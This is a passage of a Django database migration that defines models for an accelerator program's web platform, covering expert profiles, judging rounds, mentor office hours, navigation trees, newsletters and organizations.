('public_website_consent_checked', models.BooleanField(default=False, verbose_name='Public Website Consent Check')),
('judge_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Judge', verbose_name='Judge')),
('mentor_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Mentor', verbose_name='Mentor')),
('speaker_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Speaker', verbose_name='Speaker')),
('speaker_topics', models.TextField(blank=True, help_text='Please describe the topic(s) you would be available to speak about', verbose_name='Speaker Topics')),
('office_hours_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge by holding Office Hours', verbose_name='Office Hours')),
('office_hours_topics', models.TextField(blank=True, help_text='Please describe the topic(s) you would be available to speak to Finalists about during Office Hours', verbose_name='Office Hour Topics')),
('expert_group', models.CharField(blank=True, max_length=10, verbose_name='Expert Group')),
('reliability', models.DecimalField(blank=True, decimal_places=2, default=Decimal('1.00'), max_digits=3, null=True)),
('referred_by', models.TextField(blank=True, help_text='If someone referred you to MassChallenge, please provide their name (and organization if relevant). Otherwise, please indicate how you learned about the opportunity to participate at MassChallenge (helps us understand the effectiveness of our outreach programs).', max_length=500)),
('other_potential_experts', models.TextField(blank=True, help_text="We're always looking for more great experts to join the MassChallenge community and program. We welcome the names and contact info (email) of individuals you think could be great additions to the program, as well as how you think they might want to be involved (Judge, Mentor, etc.) Also, please encourage these individuals to fill out their own Expert Profile.", max_length=500)),
('internal_notes', models.TextField(blank=True, help_text='Internal notes only for use by MassChallenge Staff (not visible to Expert)', max_length=500)),
('bio', models.TextField(blank=True, default='', validators=[django.core.validators.MaxLengthValidator(7500)])),
],
options={
'db_table': 'accelerator_expertprofile',
'permissions': (('change_password', 'Can change users passwords directly'),),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTPROFILE_MODEL',
},
),
migrations.CreateModel(
name='FilePage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('file', models.FileField(storage=accelerator_abstract.models.secure_file_system_storage.SecureFileSystemStorage(location='/var/www/cms-files'), upload_to='%Y-%m')),
('description', models.TextField(blank=True)),
],
options={
'verbose_name': 'File',
'verbose_name_plural': 'Files',
'db_table': 'pagetype_accelerator_filepage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_FILEPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='FunctionalExpertise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to=settings.MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL)),
],
options={
'db_table': 'accelerator_functionalexpertise',
'abstract': False,
'managed': True,
'swappable': 'MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL',
},
),
migrations.CreateModel(
name='Industry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('icon', models.CharField(blank=True, max_length=50)),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL)),
],
options={
'verbose_name_plural': 'Industries',
'db_table': 'accelerator_industry',
'abstract': False,
'swappable': 'MPTT_SWAPPABLE_INDUSTRY_MODEL',
},
),
migrations.CreateModel(
name='InterestCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=127)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'verbose_name_plural': 'Interest Categories',
'db_table': 'accelerator_interestcategory',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_INTERESTCATEGORY_MODEL',
},
),
migrations.CreateModel(
name='JobPosting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('postdate', models.DateTimeField()),
('type', models.CharField(choices=[('NONE', 'None'), ('INTERNSHIP', 'An internship'), ('PART_TIME_PERMANENT', 'A part-time permanent position'), ('FULL_TIME_PERMANENT', 'A full-time permanent position'), ('PART_TIME_CONTRACT', 'A part-time contract position'), ('FULL_TIME_CONTRACT', 'A full-time contract position')], max_length=20)),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('applicationemail', models.EmailField(blank=True, max_length=100, null=True, verbose_name='Email address')),
('more_info_url', models.URLField(blank=True, max_length=100, null=True)),
],
options={
'verbose_name_plural': 'Job postings for startups',
'db_table': 'accelerator_jobposting',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JOBPOSTING_MODEL',
},
),
migrations.CreateModel(
name='JudgeApplicationFeedback',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('judging_status', models.IntegerField(blank=True, choices=[(1, 'No Conflict'), (2, 'Not Judged - Conflict of Interest'), (3, 'Not Judged - Other (eg., no show)')], null=True)),
('feedback_status', models.CharField(choices=[('COMPLETE', 'COMPLETE'), ('INCOMPLETE', 'INCOMPLETE'), ('NOT-JUDGED-CONFLICT', 'NOT JUDGED, CONFLICT'), ('NOT-JUDGED-OTHER', 'NOT JUDGED, OTHER')], editable=False, max_length=20)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'Judge Application Feedback',
'db_table': 'accelerator_judgeapplicationfeedback',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEAPPLICATIONFEEDBACK_MODEL',
},
),
migrations.CreateModel(
name='JudgeAvailability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('availability_type', models.CharField(choices=[('Available', 'Available'), ('Not Available', 'Not Available'), ('Preferred', 'Preferred')], max_length=32)),
],
options={
'verbose_name_plural': 'Judge availability for specific Panel types, times, locations',
'db_table': 'accelerator_judgeavailability',
'ordering': ['panel_time__start_date_time', 'panel_type__panel_type', 'panel_location__location'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEAVAILABILITY_MODEL',
},
),
migrations.CreateModel(
name='JudgeFeedbackComponent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('answer_text', models.TextField(blank=True)),
('original_answer_text', models.TextField(blank=True)),
],
options={
'verbose_name_plural': 'Feedback Components',
'db_table': 'accelerator_judgefeedbackcomponent',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEFEEDBACKCOMPONENT_MODEL',
},
),
migrations.CreateModel(
name='JudgePanelAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('assignment_status', models.CharField(blank=True, choices=[('ASSIGNED', 'ASSIGNED'), ('COMPLETE', 'COMPLETE')], default='', max_length=16)),
('panel_sequence_number', models.PositiveIntegerField(blank=True, help_text='Indicate in which order this panel should be completed by this judge', null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'assignments of judge to panel',
'db_table': 'accelerator_judgepanelassignment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEPANELASSIGNMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgeRoundCommitment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('commitment_state', models.BooleanField(default=True)),
('capacity', models.IntegerField(default=0)),
('current_quota', models.IntegerField(blank=True, null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Judge commitment to participate in a Judging Round',
'db_table': 'accelerator_judgeroundcommitment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEROUNDCOMMITMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgingForm',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'verbose_name_plural': 'Judging Forms',
'db_table': 'accelerator_judgingform',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGFORM_MODEL',
},
),
migrations.CreateModel(
name='JudgingFormElement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('element_number', models.IntegerField()),
('element_name', models.CharField(blank=True, max_length=50)),
('dashboard_label', models.CharField(blank=True, max_length=50)),
('section_heading', models.CharField(blank=True, max_length=40)),
('question_text', models.CharField(blank=True, max_length=200)),
('help_text', models.CharField(blank=True, max_length=1000)),
('element_type', models.CharField(choices=[('answer', 'Application Answer'), ('boilerplate', 'Boilerplate'), ('feedback', 'Feedback')], max_length=64)),
('feedback_type', models.CharField(blank=True, choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('display_value', models.CharField(choices=[('omit', 'Omit'), ('value', 'Value'), ('yesno', 'Yes/No')], max_length=64)),
('score_element', models.BooleanField(default=False)),
('mandatory', models.BooleanField(default=False)),
('text_box_lines', models.IntegerField(blank=True, default=0, null=True)),
('text_limit', models.IntegerField(blank=True, default=0, null=True)),
('text_limit_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('text_minimum', models.IntegerField(blank=True, default=0, null=True)),
('text_minimum_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=200)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
('sharing', models.CharField(blank=True, choices=[('share-with-startup', 'Share with Startup'), ('administrator-only', 'Share with Program Administrators')], max_length=64)),
('application_question', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONQUESTION_MODEL)),
('form_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL)),
],
options={
'verbose_name_plural': 'Judging Form Elements',
'db_table': 'accelerator_judgingformelement',
'ordering': ['form_type', 'element_number'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGFORMELEMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgingRound',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('cycle_based_round', models.BooleanField(default=False, help_text="Include startups from all programs in this Program's cycle")),
('name', models.CharField(max_length=60)),
('start_date_time', models.DateTimeField(default=None)),
('end_date_time', models.DateTimeField(default=None)),
('is_active', models.BooleanField(default=False)),
('round_type', models.CharField(choices=[('Online', 'Online'), ('In-Person', 'In-Person')], max_length=10)),
('allow_dynamic_allocation', models.BooleanField(default=False, help_text='Check this button to allow judges to get new applications without manual allocation by staff.')),
('buffer_before_event', models.IntegerField(choices=[(0, 0), (15, 15), (30, 30), (45, 45), (60, 60), (75, 75), (90, 90), (105, 105), (120, 120)], default=30, help_text='Choose a time in increments of 15 minutes.')),
('recruit_judges', models.CharField(choices=[('NO', 'Do not recruit judges or display prior commitments'), ('ANYONE', 'Recruit any expert'), ('APPROVEDONLY', 'Recruit only approved judges'), ('DISPLAYONLY', 'Only display judges prior commitments')], default='NO', max_length=16)),
('recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links')),
('positive_recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links', verbose_name='Positive Recruiting Response Label')),
('negative_recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links', verbose_name='Negative Recruiting Response Label')),
('capture_capacity', models.BooleanField(default=False)),
('capacity_prompt', models.TextField(blank=True, help_text='You may use HTML, including links')),
('capacity_options', models.CharField(blank=True, help_text="Provide a list of integers, separated by '|' (like 10|20|30)", max_length=255, validators=[accelerator_abstract.utils.validate_capacity_options])),
('capture_availability', models.CharField(choices=[('disabled', 'Disabled'), ('location-only', 'Capture location only'), ('time-only', 'Capture time only'), ('type-only', 'Capture type only')], default='disabled', max_length=32)),
('feedback_display', models.CharField(choices=[('disabled', 'Disabled'), ('enabled', 'Enabled')], default='disabled', max_length=10)),
('feedback_display_message', models.TextField(blank=True, help_text='You may use HTML, including links (not relevant if merged with another round)')),
('feedback_display_items', models.CharField(blank=True, choices=[('feedback-and-judge-category', 'Judge Category and Feedback'), ('feedback-only', 'Only Feedback'), ('judge-category-only', 'Only Judge Category')], help_text='Not relevant if merged with another round', max_length=64)),
('judge_instructions', models.TextField(blank=True, help_text='Instructions to present to judges in this round on their judging portal.')),
('presentation_mins', models.IntegerField(blank=True, default=20, help_text='Duration of startup pitch to judges, in minutes')),
('buffer_mins', models.IntegerField(blank=True, default=10, help_text='Time between startup pitches, in minutes')),
('break_mins', models.IntegerField(blank=True, default=10, help_text="Duration of judges' coffee break(s), in minutes")),
('num_breaks', models.IntegerField(blank=True, default=1, help_text='Number of breaks the judges will be given during a judging panel')),
('collision_detection_mode', models.CharField(choices=[('scenario', 'Check that applications are not added to a scenario twice'), ('panel_time', 'Check that applications are not added to the same panel time within active scenarios twice'), ('panel_slot', 'Check that applications are not added to the same panel time and slot within active scenarios twice')], default='scenario', max_length=10)),
],
options={
'verbose_name_plural': 'Judging Rounds',
'db_table': 'accelerator_judginground',
'ordering': ['program__program_status', '-program__end_date', '-end_date_time', 'name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGROUND_MODEL',
},
),
migrations.CreateModel(
name='LegalCheck',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(default='', help_text='Internal name for this check.', max_length=128, unique=True)),
('description', models.TextField(help_text='Text displayed next to checkbox. Use HTML for links.')),
('is_enabled_for_experts', models.BooleanField(default=True, help_text='This legal check is for Experts (Judges and Mentors)')),
('is_enabled_for_entrepreneurs', models.BooleanField(default=True, help_text='This legal check is for Entrepreneurs (people with Startups applying to MassChallenge)')),
],
options={
'verbose_name': 'Legal Check',
'db_table': 'accelerator_legalcheck',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_LEGALCHECK_MODEL',
},
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=100)),
('city', models.CharField(blank=True, default='', max_length=100)),
('state', models.CharField(blank=True, default='', help_text='State/Region/Province', max_length=100)),
('country', models.CharField(blank=True, default='', max_length=100)),
('postcode', models.CharField(blank=True, default='', max_length=20)),
('latitude', models.CharField(blank=True, default='', max_length=100)),
('longitude', models.CharField(blank=True, default='', max_length=100)),
('timezone', models.CharField(default='UTC', help_text='Timezone name from Olson Timezone database (https://en.wikipedia.org/wiki/Tz_database, https://en.wikipedia.org/wiki/List_of_tz_database_time_zones)', max_length=35)),
],
options={
'verbose_name_plural': 'locations',
'db_table': 'accelerator_location',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_LOCATION_MODEL',
},
),
migrations.CreateModel(
name='MemberProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
],
options={
'db_table': 'accelerator_memberprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MEMBERPROFILE_MODEL',
},
),
migrations.CreateModel(
name='MentoringSpecialties',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name': 'Mentoring Specialty',
'verbose_name_plural': 'Mentoring Specialties',
'db_table': 'accelerator_mentoringspecialties',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MENTORINGSPECIALTIES_MODEL',
},
),
migrations.CreateModel(
name='MentorProgramOfficeHour',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('start_date_time', models.DateTimeField(db_index=True)),
('end_date_time', models.DateTimeField(db_index=True)),
('description', models.TextField(blank=True)),
('old_location', models.CharField(choices=[('MassChallenge Boston', 'MassChallenge Boston'), ('MassChallenge Israel - Jerusalem', 'MassChallenge Israel - Jerusalem'), ('MassChallenge Israel - Tel Aviv', 'MassChallenge Israel - Tel Aviv'), ('MassChallenge Mexico', 'MassChallenge Mexico'), ('MassChallenge Rhode Island', 'MassChallenge Rhode Island'), ('MassChallenge Switzerland', 'MassChallenge Switzerland'), ('MassChallenge Texas - Austin', 'MassChallenge Texas - Austin'), ('MassChallenge Texas - Houston', 'MassChallenge Texas - Houston'), ('Remote - see description', 'Remote - see description'), ('Other - see description', 'Other - see description')], max_length=50)),
('notify_reservation', models.BooleanField(default=True)),
('topics', models.CharField(blank=True, max_length=500)),
('finalist', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='finalist_officehours', to=settings.AUTH_USER_MODEL, verbose_name='Finalist')),
('location', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_LOCATION_MODEL)),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mentor_officehours', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Office Hour',
'db_table': 'accelerator_mentorprogramofficehour',
'ordering': ['start_date_time'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MENTORPROGRAMOFFICEHOUR_MODEL',
},
),
migrations.CreateModel(
name='ModelChange',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('status', models.CharField(choices=[('OLD', 'OLD'), ('MIGRATING', 'MIGRATING'), ('DONE', 'DONE'), ('ERROR', 'ERROR')], default='OLD', max_length=64)),
],
options={
'db_table': 'accelerator_modelchange',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MODELCHANGE_MODEL',
},
),
migrations.CreateModel(
name='NamedGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(default='', max_length=255)),
],
options={
'db_table': 'accelerator_namedgroup',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAMEDGROUP_MODEL',
},
),
migrations.CreateModel(
name='NavTree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(blank=True, help_text='Site tree title for presentational purposes.', max_length=100, verbose_name='Title')),
('alias', models.CharField(db_index=True, help_text='Short name to address site tree from templates.<br /><b>Note:</b> change with care.', max_length=80, unique=True, verbose_name='Alias')),
],
options={
'verbose_name_plural': 'NavTrees',
'db_table': 'accelerator_navtree',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAVTREE_MODEL',
},
),
migrations.CreateModel(
name='NavTreeItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(help_text='Site tree item title. Can contain template variables E.g.: {{ mytitle }}.', max_length=100, verbose_name='Title')),
('hint', models.CharField(blank=True, default='', help_text='Some additional information about this item that is used as a hint.', max_length=200, verbose_name='Hint')),
('url', models.CharField(db_index=True, help_text='Exact URL or URL pattern (see "Additional settings") for this item.', max_length=200, verbose_name='URL')),
('urlaspattern', models.BooleanField(db_index=True, default=False, help_text='Whether the given URL should be treated as a pattern.<br /><b>Note:</b> Refer to Django "URL dispatcher" documentation (e.g. "Naming URL patterns" part).', verbose_name='URL as Pattern')),
('hidden', models.BooleanField(db_index=True, default=False, help_text='Whether to show this item in navigation.', verbose_name='Hidden')),
('alias', sitetree.models.CharFieldNullable(blank=True, db_index=True, help_text='Short name to address site tree item from a template.<br /><b>Reserved aliases:</b> "trunk", "this-children", "this-siblings", "this-ancestor-children", "this-parent-siblings".', max_length=80, null=True, verbose_name='Alias')),
('description', models.TextField(blank=True, default='', help_text='Additional comments on this item.', verbose_name='Description')),
('inmenu', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a menu.', verbose_name='Show in menu')),
('inbreadcrumbs', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a breadcrumb path.', verbose_name='Show in breadcrumb path')),
('insitetree', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a site tree.', verbose_name='Show in site tree')),
('access_loggedin', models.BooleanField(db_index=True, default=False, help_text='Check it to grant access to this item to authenticated users only.', verbose_name='Logged in only')),
('access_guest', models.BooleanField(db_index=True, default=False, help_text='Check it to grant access to this item to guests only.', verbose_name='Guests only')),
('access_restricted', models.BooleanField(db_index=True, default=False, help_text='Check it to restrict user access to this item, using Django permissions system.', verbose_name='Restrict access to permissions')),
('access_perm_type', models.IntegerField(choices=[(1, 'Any'), (2, 'All')], default=1, help_text='<b>Any</b> — user should have any of chosen permissions. <b>All</b> — user should have all chosen permissions.', verbose_name='Permissions interpretation')),
('sort_order', models.IntegerField(db_index=True, default=0, help_text='Item position among other site tree items under the same parent.', verbose_name='Sort order')),
('active_program', models.BooleanField(default=False)),
('display_single_item', models.BooleanField(default=True)),
('access_permissions', models.ManyToManyField(blank=True, to='auth.Permission', verbose_name='Permissions granting access')),
('parent', models.ForeignKey(blank=True, help_text='Parent site tree item.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='navtreeitem_parent', to=settings.ACCELERATOR_NAVTREEITEM_MODEL, verbose_name='Parent')),
],
options={
'verbose_name_plural': 'NavTreeItems',
'db_table': 'accelerator_navtreeitem',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAVTREEITEM_MODEL',
},
),
migrations.CreateModel(
name='Newsletter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=127)),
('subject', models.CharField(blank=True, help_text='Best practice: keep subject lines short', max_length=500)),
('from_addr', models.CharField(blank=True, max_length=255, null=True)),
('cc_addrs', models.CharField(blank=True, help_text='Zero or more email addresses to CC; separate with commas', max_length=500, null=True)),
('date_mailed', models.DateTimeField(blank=True, editable=False, null=True)),
],
options={
'db_table': 'accelerator_newsletter',
'ordering': ('-created_at', 'name'),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NEWSLETTER_MODEL',
},
),
migrations.CreateModel(
name='NewsletterReceipt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('newsletter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NEWSLETTER_MODEL)),
('recipient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_newsletterreceipt',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NEWSLETTERRECEIPT_MODEL',
},
),
migrations.CreateModel(
name='NodePublishedFor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
options={
'verbose_name': 'Node is Published For',
'verbose_name_plural': 'Node is Published For',
'db_table': 'accelerator_nodepublishedfor',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NODEPUBLISHEDFOR_MODEL',
},
),
migrations.CreateModel(
name='NodeSubNavAssociation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
options={
'verbose_name': 'Node Sub Navigation Association',
'verbose_name_plural': 'Node Sub Navigation Associations',
'db_table': 'accelerator_nodesubnavassociation',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NODESUBNAVASSOCIATION_MODEL',
},
),
migrations.CreateModel(
name='Observer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('first_name', models.CharField(blank=True, max_length=50, null=True)),
('last_name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=100, verbose_name='Email address')),
('title', models.CharField(blank=True, max_length=50)),
('company', models.CharField(blank=True, max_length=50)),
('newsletter_sender', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Observer',
'verbose_name_plural': 'Observers',
'db_table': 'accelerator_observer',
'ordering': ['last_name', 'first_name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_OBSERVER_MODEL',
},
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('website_url', models.URLField(blank=True, max_length=100, verbose_name='Website URL')),
('twitter_handle', models.CharField(blank=True, help_text='Omit the "@". We\'ll add it.', max_length=40, verbose_name='Twitter handle')),
('public_inquiry_email', models.EmailField(blank=True, max_length=100, verbose_name='Email address')),
